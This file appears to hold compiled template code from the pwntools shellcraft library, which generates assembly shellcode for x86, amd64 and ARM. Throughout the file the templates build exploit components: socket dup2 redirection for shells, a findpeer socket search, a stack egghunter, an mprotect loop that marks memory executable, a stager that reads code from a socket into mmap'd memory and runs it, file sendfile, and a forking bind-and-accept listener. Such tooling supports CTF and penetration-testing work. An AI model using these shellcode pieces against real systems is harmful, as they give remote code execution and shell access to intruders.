def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
helper, end = common.label("helper"), common.label("end")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['end', 'helper']
if __M_key in __M_locals_builtin_stored]))
__M_writer(
u'\n.code32\n push 0x33 /* This is the segment we want to go to */\n call $+4\n'
)
__M_writer(unicode(helper))
__M_writer(u':\n .byte 0xc0\n add dword ptr [esp], ')
__M_writer(unicode(end))
__M_writer(u' - ')
__M_writer(unicode(helper))
__M_writer(u'\n jmp far [esp]\n')
__M_writer(unicode(end))
__M_writer(u':\n.code64\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, port=None, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, port=port)
int = context.get('int', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from socket import htons
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['htons']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
findpeer = common.label("findpeer")
looplabel = common.label("loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['findpeer', 'looplabel']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(unicode(findpeer))
__M_writer(
u':\n push -1\n push SYS_socketcall_getpeername\n mov ebp, esp\n pop ebx\n pop esi\n\n'
)
__M_writer(unicode(looplabel))
__M_writer(
u':\n push SYS_socketcall\n pop eax\n\n inc esi\n lea ecx, [esp-32]\n\n push 4\n pushad\n\n int 0x80\n'
)
if port == None:
__M_writer(u' test eax, eax\n popad\n pop edx\n jnz ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
else:
__M_writer(
u' popad\n pop edx\n shr eax, 16\n cmp ax, ')
__M_writer(unicode(htons(int(port))))
__M_writer(u'\n jne ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, sock='ebp', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
dup = common.label("dup")
looplabel = common.label("loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['dup', 'looplabel']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n\n')
__M_writer(unicode(dup))
__M_writer(u':\n ')
__M_writer(unicode(i386.mov('ebx', sock)))
__M_writer(u'\n ')
__M_writer(unicode(i386.mov('ecx', 3)))
__M_writer(u'\n')
__M_writer(unicode(looplabel))
__M_writer(u':\n dec ecx\n\n ')
__M_writer(unicode(i386.linux.syscall('SYS_dup2', 'ebx', 'ecx')))
__M_writer(u'\n jnz ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, sock='r6', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft.thumb import mov
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['mov']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
dup = common.label("dup")
looplabel = common.label("loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['dup', 'looplabel']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(unicode(dup))
__M_writer(u':\n ')
__M_writer(unicode(mov('r1', 2)))
__M_writer(u'\n ')
__M_writer(unicode(mov('r7', 'SYS_dup2')))
__M_writer(u'\n\n')
__M_writer(unicode(looplabel))
__M_writer(u':\n ')
__M_writer(unicode(mov('r0', sock)))
__M_writer(u'\n svc 1\n subs r1, #1\n bpl ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
infloop = common.label("infloop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['infloop']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(unicode(infloop))
__M_writer(u':\n b ')
__M_writer(unicode(infloop))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, sock='rbp', **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock)
__M_writer = context.writer()
from pwnlib.shellcraft import common, amd64
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common', 'amd64']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
dup = common.label("dup")
looplabel = common.label("loop")
after = common.label("after")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['dup', 'after', 'looplabel']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n\n\n')
__M_writer(unicode(dup))
__M_writer(u':\n ')
__M_writer(unicode(amd64.mov('rbp', sock)))
__M_writer(u'\n\n push 3\n')
__M_writer(unicode(looplabel))
__M_writer(u':\n pop rsi\n dec rsi\n js ')
__M_writer(unicode(after))
__M_writer(u'\n push rsi\n\n ')
__M_writer(unicode(amd64.linux.syscall('SYS_dup2', 'rbp', 'rsi')))
__M_writer(u'\n\n jmp ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
__M_writer(unicode(after))
__M_writer(u':\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, cookie=2063395672, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, cookie=cookie)
hex = context.get('hex', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
stackhunter = common.label("stackhunter")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['stackhunter']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if (cookie & 0xffffff) == 0xfceb58:
__M_writer(unicode(stackhunter))
__M_writer(u':\n cmp eax, ')
__M_writer(unicode(hex(cookie)))
__M_writer(u'\n jne ')
__M_writer(unicode(stackhunter))
__M_writer(u'+1\n jmp esp\n')
else:
__M_writer(unicode(stackhunter))
__M_writer(u':\n pop eax\n cmp eax, ')
__M_writer(unicode(hex(cookie)))
__M_writer(u'\n jne ')
__M_writer(unicode(stackhunter))
__M_writer(u'\n jmp esp\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, filename, fd=1, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
fd=fd,
filename=filename)
__M_writer = context.writer()
from pwnlib.shellcraft import i386
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386', 'common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
label = common.label("sendfile_loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['label']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n\n ')
__M_writer(unicode(i386.pushstr(filename)))
__M_writer(u'\n ')
__M_writer(unicode(i386.syscall('SYS_open', 'esp', 0, 'O_RDONLY')))
__M_writer(u'\n ')
__M_writer(
unicode(i386.syscall('SYS_sendfile', fd, 'eax', 0, 0x7fffffff)))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, clear_ebx=True, fix_null=False, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(clear_ebx=clear_ebx,
pageargs=pageargs,
fix_null=fix_null)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
label = common.label("mprotect_loop")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['label']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n\n')
if clear_ebx:
__M_writer(u' xor ebx, ebx\n')
if fix_null:
__M_writer(u' xor ecx, ecx\n')
__M_writer(unicode(label))
__M_writer(
u':\n push PROT_READ | PROT_WRITE | PROT_EXEC\n pop edx\n push SYS_mprotect\n pop eax\n int 0x80\n xor ecx, ecx\n mov ch, 0x10\n add ebx, ecx\n jnz '
)
__M_writer(unicode(label))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, sock, size, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, sock=sock, size=size)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft import i386
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['i386']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.shellcraft.i386 import linux
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['linux']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n\n')
stager = common.label("stager")
mmap = common.label("mmap")
looplabel = common.label("loop")
errlabel = common.label("error")
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['mmap', 'stager', 'looplabel', 'errlabel']
if __M_key in __M_locals_builtin_stored
]))
__M_writer(u'\n\n')
__M_writer(unicode(stager))
__M_writer(
u':\n/* old_mmap(NULL, size, PROT_EXEC|PROT_WRITE|PROT_READ, MAP_ANON|MAP_PRIVATE, -1) */\n push '
)
__M_writer(unicode(sock))
__M_writer(
u'\n xor eax, eax\n mov al, SYS_mmap\n xor ebx, ebx\n '
)
__M_writer(unicode(i386.mov("ecx", size)))
__M_writer(
u'\n push ecx\n xor edx, edx\n mov dl, PROT_EXEC|PROT_WRITE|PROT_READ\n push MAP_ANON|MAP_PRIVATE\n pop esi\n xor edi, edi\n dec edi\n int 0x80\n push eax\n\n pop ecx /* addr of mmaped buffer */\n pop edx /* size */\n pop ebx /* sock */\n push ecx /* save for: pop eax; call eax later */\n\n/* read/recv loop */\n'
)
__M_writer(unicode(looplabel))
__M_writer(
u':\n xor eax, eax\n mov al, SYS_read\n int 0x80\n test eax, eax\n js '
)
__M_writer(unicode(errlabel))
__M_writer(
u'\n sub edx, eax\n add ecx, eax\n test edx, edx\n jne '
)
__M_writer(unicode(looplabel))
__M_writer(
u'\n\n pop eax /* start of mmaped buffer */\n push ebx /* sock */\n call eax /* jump and hope for it to work */\n\n'
)
__M_writer(unicode(errlabel))
__M_writer(u':\n hlt\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context,dst,src,**pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(src=src,dst=dst,pageargs=pageargs)
int = context.get('int', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
long = context.get('long', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['common'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n/* Set ')
__M_writer(unicode(dst))
__M_writer(u' = ')
__M_writer(unicode(src))
__M_writer(u' */\n')
if not isinstance(src, (int, long)):
__M_writer(u' mov ')
__M_writer(unicode(dst))
__M_writer(u', ')
__M_writer(unicode(src))
__M_writer(u'\n')
else:
__M_writer(u' ')
srcu = src & 0xffffffff
srcs = srcu - 2 * (srcu & 0x80000000)
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['srcs','srcu'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if srcu == 0:
__M_writer(u' eor ')
__M_writer(unicode(dst))
__M_writer(u', ')
__M_writer(unicode(dst))
__M_writer(u'\n')
elif srcu < 256:
__M_writer(u' mov ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(src))
__M_writer(u'\n')
elif -256 < srcs < 0:
__M_writer(u' eor ')
__M_writer(unicode(dst))
__M_writer(u', ')
__M_writer(unicode(dst))
__M_writer(u'\n sub ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(-srcs))
__M_writer(u'\n')
else:
__M_writer(u' ')
shift1 = 0
while (1 << shift1) & src == 0:
shift1 += 1
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['shift1'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if (0xff << shift1) & src == src:
if shift1 < 4:
__M_writer(u' mov ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(src >> shift1))
__M_writer(u'\n lsl ')
__M_writer(unicode(dst))
__M_writer(u', #4\n lsr ')
__M_writer(unicode(dst))
__M_writer(u', #{4 - shift1}\n')
else:
__M_writer(u' mov ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(src >> shift1))
__M_writer(u'\n lsl ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(shift1))
__M_writer(u'\n')
else:
__M_writer(u' ')
shift2 = 8
while (1 << shift2) & src == 0:
shift2 += 1
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['shift2'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if ((0xff << shift2) | 0xff) & src == src:
__M_writer(u' mov ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(src >> shift2))
__M_writer(u'\n lsl ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(shift2))
__M_writer(u'\n add ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(src & 0xff))
__M_writer(u'\n')
else:
__M_writer(u' ')
shift3 = shift1 + 8
while (1 << shift3) & src == 0:
shift3 += 1
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['shift3'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
if ((0xff << shift1) | (0xff << shift3)) & src == src:
__M_writer(u' mov ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(src >> shift3))
__M_writer(u'\n lsl ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(shift3 - shift1))
__M_writer(u'\n add ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode((src >> shift1) & 0xff))
__M_writer(u'\n lsl ')
__M_writer(unicode(dst))
__M_writer(u', #')
__M_writer(unicode(shift1))
__M_writer(u'\n')
else:
__M_writer(u' ')
id = common.label("value")
extra = ''
if (src & 0xff000000 == 0):
src = src | 0xff000000
extra = '\n '.join([
"lsl %s, #8" % dst,
"lsr %s, #8" % dst
])
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in ['src','id','extra'] if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n ldr ')
__M_writer(unicode(dst))
__M_writer(u', ')
__M_writer(unicode(id))
__M_writer(u'\n b ')
__M_writer(unicode(id))
__M_writer(u'_after\n ')
__M_writer(unicode(id))
__M_writer(u': .word ')
__M_writer(unicode(src))
__M_writer(u'\n ')
__M_writer(unicode(id))
__M_writer(u'_after:\n ')
__M_writer(unicode(extra))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, filepath, flags='O_RDONLY', mode=420, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs,
flags=flags,
mode=mode,
filepath=filepath)
int = context.get('int', UNDEFINED)
hex = context.get('hex', UNDEFINED)
repr = context.get('repr', UNDEFINED)
long = context.get('long', UNDEFINED)
len = context.get('len', UNDEFINED)
str = context.get('str', UNDEFINED)
ord = context.get('ord', UNDEFINED)
isinstance = context.get('isinstance', UNDEFINED)
__M_writer = context.writer()
__M_writer(u'\n')
__M_writer(u'\n')
from pwnlib.shellcraft.common import label
from pwnlib.asm import cpp
from pwnlib.util.safeeval import expr
from pwnlib.constants.linux import arm as consts
filepath_lab, after = label("filepath"), label("after")
filepath_out = [hex(ord(c)) for c in filepath]
while True:
filepath_out.append("0")
if len(filepath_out) % 4 == 0:
break
filepath_out = ', '.join(filepath_out)
if isinstance(mode, (int, long)):
mode = hex(mode)
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key]) for __M_key in [
'c', 'filepath_lab', 'expr', 'after', 'filepath_out',
'label', 'mode', 'consts', 'cpp'
] if __M_key in __M_locals_builtin_stored
]))
__M_writer(u'\n')
if expr(cpp("%s & O_CREAT" % flags, arch='arm', os='linux')):
__M_writer(u' mov r2, #(')
__M_writer(unicode(mode))
__M_writer(u')\n')
__M_writer(u' mov r1, #(')
__M_writer(unicode(flags))
__M_writer(u')\n adr r0, ')
__M_writer(unicode(filepath_lab))
__M_writer(u'\n svc SYS_open\n b ')
__M_writer(unicode(after))
__M_writer(u'\n\n /* The string ')
__M_writer(unicode(repr(str(filepath))))
__M_writer(u' */\n')
__M_writer(unicode(filepath_lab))
__M_writer(u': .byte ')
__M_writer(unicode(filepath_out))
__M_writer(u'\n\n')
__M_writer(unicode(after))
__M_writer(u':\n')
return ''
finally:
context.caller_stack._pop_frame()
def render_body(context, port, **pageargs):
__M_caller = context.caller_stack._push_frame()
try:
__M_locals = __M_dict_builtin(pageargs=pageargs, port=port)
int = context.get('int', UNDEFINED)
i386 = context.get('i386', UNDEFINED)
__M_writer = context.writer()
from pwnlib.shellcraft import common
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['common']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.constants.linux import i386 as constants
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['constants']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from pwnlib.util.packing import make_packer
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['make_packer']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
from socket import htons
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['htons']
if __M_key in __M_locals_builtin_stored]))
__M_writer(u'\n')
__M_writer(u'\n')
__M_writer(u'\n')
acceptloop = common.label("acceptloop")
looplabel = common.label("loop")
p16 = make_packer(16, 'little', 'unsigned')
p16b = make_packer(16, 'big', 'unsigned')
__M_locals_builtin_stored = __M_locals_builtin()
__M_locals.update(
__M_dict_builtin([
(__M_key, __M_locals_builtin_stored[__M_key])
for __M_key in ['acceptloop', 'p16b', 'looplabel', 'p16']
if __M_key in __M_locals_builtin_stored
]))
__M_writer(u'\n\n')
__M_writer(unicode(acceptloop))
__M_writer(u':\n /* Listens for and accepts a connection on ')
__M_writer(unicode(int(port)))
__M_writer(
u'd forever */\n /* Socket file descriptor is placed in EBP */\n\n /* sock = socket(AF_INET, SOCK_STREAM, 0) */\n '
)
__M_writer(unicode(i386.mov('eax', constants.SYS_socketcall)))
__M_writer(u'\n ')
__M_writer(unicode(i386.mov('ebx', constants.SYS_socketcall_socket)))
__M_writer(
u'\n cdq /* clear EDX */\n push edx /* IPPROTO_IP (= 0) */\n push ebx /* SOCK_STREAM */\n push AF_INET\n '
)
__M_writer(unicode(i386.linux.syscall('eax', 'ebx', 'esp')))
__M_writer(
u'\n\n /* bind(sock, &addr, sizeof addr); // sizeof addr == 0x10 */\n push edx\n '
)
__M_writer(
unicode(i386.pushstr(p16(constants.AF_INET) + p16b(int(port)))))
__M_writer(
u'\n mov ecx, esp\n push 0x10\n push ecx\n push eax\n mov ecx, esp\n mov esi, eax\n inc ebx /* EBX = bind (= 2) */\n mov al, byte SYS_socketcall\n int 0x80\n\n /* listen(sock, whatever) */\n mov al, byte SYS_socketcall\n mov bl, byte SYS_socketcall_listen\n int 0x80\n\n\n'
)
__M_writer(unicode(looplabel))
__M_writer(
u':\n /* accept(sock, NULL, NULL) */\n push edx\n push esi /* sock */\n mov ecx, esp\n mov al, byte SYS_socketcall\n mov bl, byte SYS_socketcall_accept\n int 0x80\n\n mov ebp, eax\n\n mov al, SYS_fork\n int 0x80\n xchg eax, edi\n\n test edi, edi\n mov ebx, ebp\n cmovz ebx, esi /* on child we close the server sock instead */\n\n /* close(sock) */\n '
)
__M_writer(unicode(i386.linux.syscall('SYS_close', 'ebx')))
__M_writer(u'\n\n test edi, edi\n jnz ')
__M_writer(unicode(looplabel))
__M_writer(u'\n')
return ''
finally:
context.caller_stack._pop_frame()